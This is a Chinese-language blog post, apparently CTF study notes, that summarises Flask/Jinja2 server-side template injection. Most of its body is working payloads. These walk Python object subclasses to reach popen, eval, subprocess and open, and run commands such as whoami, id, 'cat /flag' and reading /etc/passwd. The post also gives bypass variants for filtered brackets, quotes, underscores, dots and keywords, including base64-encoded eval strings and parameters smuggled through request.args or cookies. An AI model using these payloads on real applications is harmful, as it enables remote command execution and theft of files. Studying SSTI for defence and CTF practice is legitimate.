<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="[object Object]"><meta name="description" content="[TOC]
ssti思路服务端模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，"><meta name="author" content="Katharsis"><title>Flask ssti模板注入一些总结 - Kath4rs1s</title><meta description="[TOC] ssti思路服务端模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，"><meta property="og:type" content="article"><meta property="og:title" content="Flask ssti模板注入一些总结"><meta property="og:url" content="http://yoursite.com/2020/07/25/ssti-1/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="[TOC] ssti思路服务端模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，"><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-07-25T06:39:38.000Z"><meta property="article:modified_time" content="2020-09-16T05:11:36.836Z"><meta property="article:author" content="Katharsis"><meta property="article:tag" content="ssti"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/07/25/ssti-1/"},"headline":"Flask ssti模板注入一些总结","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-07-25T06:39:38.000Z","dateModified":"2020-09-16T05:11:36.836Z","author":{"@type":"Person","name":"Katharsis"},"description":"[TOC] ssti思路服务端模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，"}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-07-25  <span class="level-item"><i class="far fa-clock"> </i>11 m  <i class="fas fa-pencil-alt"> </i>1.6 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">Flask ssti模板注入一些总结</h1><div class="content"><p>[TOC]</p>
<h1 id="ssti思路"><a href="#ssti思路" class="headerlink" title="ssti思路"></a>ssti思路</h1><p>服务端模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，<a id="more"></a>在进行目标编译渲染的过程中，执行了用户插入的恶意内容，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。</p>
<p>ssti模板注入的基本思路就是通过<code>__class__</code>属性找到基类object，通过<code>__subclasses__()</code>查看object中有哪些类可以使用，一般都是去寻找os类，然后通过<strong>blobals</strong>全局来查找所有的方法及变量及参数，通常用到<code>&lt;class &#39;os._wrap_close&#39;&gt;</code>类的<code>popen</code>方法。</p>
<h1 id="基本流程"><a href="#基本流程" class="headerlink" title="基本流程"></a>基本流程</h1><h2 id="首先获取基本类"><a href="#首先获取基本类" class="headerlink" title="首先获取基本类"></a>首先获取基本类</h2><p>首先通过str、dict、tuple或list等获取python的基本类</p>
<ul>
<li><strong>dict</strong>：保存类实例或对象实例的属性变量键值对字典</li>
<li><strong>class</strong>：返回调用的参数类型</li>
<li><strong>mro</strong>：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。</li>
<li><strong>bases</strong>：返回类型列表</li>
<li><strong>subclasses</strong>：返回object的子类</li>
<li><strong>init</strong>：类的初始化方法</li>
<li><strong>globals</strong>：函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价</li>
</ul>
<p>也可以用一些其他在jinja2中存在的对象，比如<code>request</code>。在Python中，每个类都有一个<strong>bases</strong>属性，列出其基类，而<strong>mro</strong>返回的时解析方法调用的顺序，在其中选择<strong>object</strong>类就好了。</p>
<ul>
<li><code>&#39;&#39;.__class__.__base__</code></li>
<li><code>&#39;&#39;.__class__.__mro__[1]</code></li>
<li><code>&quot;&quot;.__class__.__bases__[0]</code></li>
<li><code>().__class__.__bases__[0]</code></li>
<li><code>[].__class__.__bases__[0]</code></li>
<li><code>{}.__class__.__mro__[1]</code></li>
<li><code>request.__class__.__mro__[1]</code></li>
</ul>
<p>可以借助```<strong>getitem</strong>绕过中括号的限制：</p>
<ul>
<li><code>&#39;&#39;.__class__.__mro__.__getitem__(1)</code></li>
<li><code>{}.__class__.__bases__.__getitem__(0)</code></li>
<li><code>().__class__.__bases__.__getitem__(0)</code></li>
<li><code>request.__class__.__mro__.__getitem__(1)</code></li>
</ul>
<h2 id="寻找方法"><a href="#寻找方法" class="headerlink" title="寻找方法"></a>寻找方法</h2><p>获取基本类后，继续向下获取基本类<code>object</code>的子类：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()</span><br></pre></td></tr></table></figure>

<p>找到重载过的<strong>init</strong>类（在获取初始化属性后，带 wrapper 的说明没有重载，寻找不带 warpper 的）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">print(&quot;&quot;.__class__.__bases__[0].__subclasses__()[-1].__init__)</span><br><span class="line">print(&quot;&quot;.__class__.__bases__[0].__subclasses__()[1].__init__)</span><br><span class="line">输出：</span><br><span class="line">&lt;function BlueprintSetupState.__init__ at 0x038CE0C0&gt;</span><br><span class="line">&lt;slot wrapper &#39;__init__&#39; of &#39;weakref&#39; objects&gt;</span><br></pre></td></tr></table></figure>
<p>查看其引用<strong>builtins</strong><br>Python 程序一旦启动，它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于 builtins 却不用导入，它在任何模块都直接可见，所以这里直接调用引用的模块。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[-1].__init__.__globals__[&#39;__builtins__&#39;]</span><br></pre></td></tr></table></figure>
<p>这里会返回 dict 类型，寻找 keys 中可用函数，直接调用即可，使用 keys 中的 open （python2中是file）以实现读取文件的功能：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[-1].__init__.__globals__[&#39;__builtins__&#39;][&#39;open&#39;](&#39;D:\\test.txt&#39;).read()</span><br></pre></td></tr></table></figure>

<h2 id="读写文件"><a href="#读写文件" class="headerlink" title="读写文件"></a>读写文件</h2><p>在python2中使用file读写文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#读文件：</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[40](&#39;&#x2F;etc&#x2F;passwd&#39;).read()</span><br><span class="line">#写文件：</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[40](&#39;&#x2F;tmp&#39;).write(&#39;test&#39;)</span><br></pre></td></tr></table></figure>
<p>在python3中file没有了，使用open：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#读文件：</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[-1].__init__.__globals__[&#39;__builtins__&#39;][&#39;open&#39;](&#39;D:\\test.txt&#39;).read()</span><br></pre></td></tr></table></figure>

<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><h3 id="1-popen"><a href="#1-popen" class="headerlink" title="1.popen"></a>1.popen</h3><p>使用<code>popen</code>进行命令执行。<br>首先要先找到<code>os._wrap_close</code>类，<br>查看 os._wrap_close 方法的位置：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; import os</span><br><span class="line">&gt;&gt;&gt; &#39;&#39;.__class__.__mro__[1].__subclasses__().index(os._wrap_close)</span><br><span class="line">132</span><br></pre></td></tr></table></figure>
<p>返回了下标索引，直接调用它</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[&#39;popen&#39;](&#39;ls&#39;).read()</span><br></pre></td></tr></table></figure>

<h3 id="2-eval"><a href="#2-eval" class="headerlink" title="2.eval"></a>2.eval</h3><p>使用<code>eval</code>进行命令执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](&#39;__import__(&quot;os&quot;).popen(&quot;ls&quot;).read()&#39;)</span><br></pre></td></tr></table></figure>

<h3 id="3-warnings-catch-warnings"><a href="#3-warnings-catch-warnings" class="headerlink" title="3.warnings.catch_warnings"></a>3.warnings.catch_warnings</h3><p>利用warnings.catch_warnings 进行命令执行。<br>这个在python2和python3中有些不同，先说Python2的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__base__.__subclasses__()[59].__init__.__globals__[&#39;linecache&#39;].__dict__.values()[12].__dict__.values()[144](&#39;whoami&#39;)</span><br></pre></td></tr></table></figure>
<p>然后是Python3的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">().__class__.__bases__[0].__subclasses__()[139].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](&quot;__import__(&#39;os&#39;).popen(&#39;whoami&#39;).read()&quot;)</span><br></pre></td></tr></table></figure>
<p>或者也可以这样多行执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% if c.__name__ &#x3D;&#x3D; &#39;catch_warnings&#39; %&#125;</span><br><span class="line">  &#123;% for b in c.__init__.__globals__.values() %&#125;</span><br><span class="line">  &#123;% if b.__class__ &#x3D;&#x3D; &#123;&#125;.__class__ %&#125;</span><br><span class="line">    &#123;% if &#39;eval&#39; in b.keys() %&#125;</span><br><span class="line">      &#123;&#123; b[&#39;eval&#39;](&#39;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&#39;) &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">  &#123;% endif %&#125;</span><br><span class="line">  &#123;% endfor %&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<h3 id="4-subprocess"><a href="#4-subprocess" class="headerlink" title="4.subprocess"></a>4.subprocess</h3><p>这个模块原本在python2中是<code>commands</code>，在python中被替换为<code>subprocess</code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[139].__init__.__globals__[&#39;__builtins__&#39;][&#39;__import__&#39;](&#39;subprocess&#39;).getstatusoutput(&#39;ls&#39;)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[139].__init__.__globals__[&#39;__builtins__&#39;][&#39;__import__&#39;](&#39;os&#39;).system(&#39;ls&#39;)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[139].__init__.__globals__[&#39;__builtins__&#39;][&#39;__import__&#39;](&#39;os&#39;).popen(&#39;ls&#39;).read()</span><br></pre></td></tr></table></figure>

<h1 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h1><p>现在很多模板注入都有限制，比如限制输入某些关键字，或者干脆直接限制输入某些字符。下面总结了一些绕过的方法。</p>
<h2 id="过滤"><a href="#过滤" class="headerlink" title="过滤[]"></a>过滤[]</h2><p>使用getitem()或者pop()绕过，如：<code>&quot;&quot;.__class__.__bases__[0]</code><br>绕过后：<code>&quot;&quot;.__class__.__bases__.getitem(0)</code></p>
<p>读文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__base__.__subclasses__().pop(-1).__init__.__globals__.pop(&#39;__builtins__&#39;).pop(&#39;open&#39;)(&#39;test.txt&#39;).read()</span><br></pre></td></tr></table></figure>
<p>执行命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;&#39;.__class__.__base__.__subclasses__().pop(132).__init__.__globals__.pop(&#39;popen&#39;)(&#39;ls&#39;).read()</span><br></pre></td></tr></table></figure>

<h2 id="过滤引号"><a href="#过滤引号" class="headerlink" title="过滤引号"></a>过滤引号</h2><p>request.args 是 flask 中的一个属性，为返回请求的参数，这里把<code>popen</code>和<code>cmd</code>当作变量名，将值传进来，进而绕过了引号的过滤。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__().pop(117).__init__.__globals__[request.args.popen](request.args.cmd).read()&#125;&#125;&amp;popen&#x3D;popen&amp;cmd&#x3D;whoami</span><br></pre></td></tr></table></figure>

<h2 id="过滤下划线"><a href="#过滤下划线" class="headerlink" title="过滤下划线"></a>过滤下划线</h2><p>也是动态传参绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&quot;&quot;[request.args.class][request.args.base][request.args.subclasses]()[117][request.args.init][request.args.globals][request.args.popen](request.args.cmd).read()&#125;&#125;&amp;class&#x3D;__class__&amp;base&#x3D;__base__&amp;subclasses&#x3D;__subclasses__&amp;init&#x3D;__init__&amp;globals&#x3D;__globals__&amp;popen&#x3D;popen&amp;cmd&#x3D;cat &#x2F;flag</span><br></pre></td></tr></table></figure>

<h2 id="过滤关键字"><a href="#过滤关键字" class="headerlink" title="过滤关键字"></a>过滤关键字</h2><p>比如过滤掉<code>subclasses</code>：</p>
<h3 id="使用request-args动态传参绕过"><a href="#使用request-args动态传参绕过" class="headerlink" title="使用request.args动态传参绕过"></a>使用<code>request.args</code>动态传参绕过</h3><p>比如过滤掉<code>subclasses</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__bases__[0][request.args.a]()[117].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](&#39;__import__(&quot;os&quot;).popen(&quot;ls&quot;).read()&#39;)&#125;&#125;&amp;a&#x3D;__subclasses__</span><br><span class="line"># cookie传值</span><br><span class="line">&quot;&quot;.__class__.__bases__[0][request.cookies[&#39;var&#39;]]()[117].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](&#39;__import__(&quot;os&quot;).popen(&quot;ls&quot;).read()&#39;)</span><br></pre></td></tr></table></figure>

<h3 id="使用base64编码绕过"><a href="#使用base64编码绕过" class="headerlink" title="使用base64编码绕过"></a>使用base64编码绕过</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 编码前</span><br><span class="line">().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__[&#39;eval&#39;](&quot;__import__(&#39;os&#39;).popen(&#39;ls&#39;).read()&quot;)</span><br><span class="line"># 编码后</span><br><span class="line">().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__[&#39;ZXZhbA&#x3D;&#x3D;&#39;.decode(&#39;base64&#39;)](&quot;X19pbXBvcnRfXygnb3MnKS5wb3BlbignbHMnKS5yZWFkKCk&#x3D;&quot;.decode(&#39;base64&#39;))</span><br></pre></td></tr></table></figure>

<h3 id="使用字符串拼接绕过"><a href="#使用字符串拼接绕过" class="headerlink" title="使用字符串拼接绕过"></a>使用字符串拼接绕过</h3><p>使用加号来拼接字符串，<code> = </code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__.__base__[&#39;__subcl&#39;+&#39;asses__&#39;]()[117].__init__.__globals__[&#39;popen&#39;](&#39;ls&#39;).read()</span><br></pre></td></tr></table></figure>
<p>使用join连接字符串，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[].__getattribute__([&#39;__c&#39;,&#39;lass__&#39;]|join).__base__.__subclasses__()[117].__init__.__globals__[&#39;popen&#39;](&#39;ls&#39;).read()</span><br></pre></td></tr></table></figure>

<h2 id="过滤点号"><a href="#过滤点号" class="headerlink" title="过滤点号"></a>过滤点号</h2><p>jinja2模板中有很多有用的内置过滤器，这里使用的是<code>attr</code>和<code>join</code>这两个过滤器。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#96;&#96;&#96;&#123;&#123;request|attr([&quot;_&quot;*2,&quot;class&quot;,&quot;_&quot;*2]|join)&#125;&#125;&#96;&#96;&#96;就相当于&#96;&#96;&#96;&#123;&#123;request.__class__&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>还有关于过滤的方式：</p>
<blockquote>
<p><a href="https://github.red/cybrics-2020-web-writeup/">https://github.red/cybrics-2020-web-writeup/</a></p>
</blockquote>
<h1 id="使用工具"><a href="#使用工具" class="headerlink" title="使用工具"></a>使用工具</h1><h2 id="Tplmap"><a href="#Tplmap" class="headerlink" title="Tplmap"></a>Tplmap</h2><blockquote>
<p>服务器端模板注入和代码注入检测与开发工具</p>
</blockquote>
<p>一个 python 工具，可以通过使用沙箱转义技术找到代码注入和服务器端模板注入（SSTI）漏洞。该工具能够在许多模板引擎中利用 SSTI 来访问目标文件或操作系统。一些受支持的模板引擎包括 PHP、Ruby、JaveScript、Python、ERB、Jinja2 和 Tornado。该工具可以执行对这些模板引擎的盲注入，并具有执行远程命令的能力。</p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/07/25/ssti-1/">Flask ssti模板注入一些总结</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/07/25/ssti-1/">http://yoursite.com/2020/07/25/ssti-1/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/07/31/links/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">一些笔记</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/07/23/webshell/"><span class="level-item">无字母数字构造webshell的学习</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-ssti思路" href="#ssti思路"><span>ssti思路</span></a></li><li><a class="is-flex toc-item" id="toc-item-基本流程" href="#基本流程"><span>基本流程</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-首先获取基本类" href="#首先获取基本类"><span>首先获取基本类</span></a></li><li><a class="is-flex toc-item" id="toc-item-寻找方法" href="#寻找方法"><span>寻找方法</span></a></li><li><a class="is-flex toc-item" id="toc-item-读写文件" href="#读写文件"><span>读写文件</span></a></li><li><a class="is-flex toc-item" id="toc-item-命令执行" href="#命令执行"><span>命令执行</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-1-popen" href="#1-popen"><span>1.popen</span></a></li><li><a class="is-flex toc-item" id="toc-item-2-eval" href="#2-eval"><span>2.eval</span></a></li><li><a class="is-flex toc-item" id="toc-item-3-warnings-catch-warnings" href="#3-warnings-catch-warnings"><span>3.warnings.catch_warnings</span></a></li><li><a class="is-flex toc-item" id="toc-item-4-subprocess" href="#4-subprocess"><span>4.subprocess</span></a></li></ul></li></ul></li><li><a class="is-flex toc-item" id="toc-item-Bypass" href="#Bypass"><span>Bypass</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-过滤" href="#过滤"><span>过滤[]</span></a></li><li><a class="is-flex toc-item" id="toc-item-过滤引号" href="#过滤引号"><span>过滤引号</span></a></li><li><a class="is-flex toc-item" id="toc-item-过滤下划线" href="#过滤下划线"><span>过滤下划线</span></a></li><li><a class="is-flex toc-item" id="toc-item-过滤关键字" href="#过滤关键字"><span>过滤关键字</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-使用request-args动态传参绕过" href="#使用request-args动态传参绕过"><span>使用request.args动态传参绕过</span></a></li><li><a class="is-flex toc-item" id="toc-item-使用base64编码绕过" href="#使用base64编码绕过"><span>使用base64编码绕过</span></a></li><li><a class="is-flex toc-item" id="toc-item-使用字符串拼接绕过" href="#使用字符串拼接绕过"><span>使用字符串拼接绕过</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-过滤点号" href="#过滤点号"><span>过滤点号</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-使用工具" href="#使用工具"><span>使用工具</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-Tplmap" href="#Tplmap"><span>Tplmap</span></a></li></ul></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">22</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">5</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">4</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
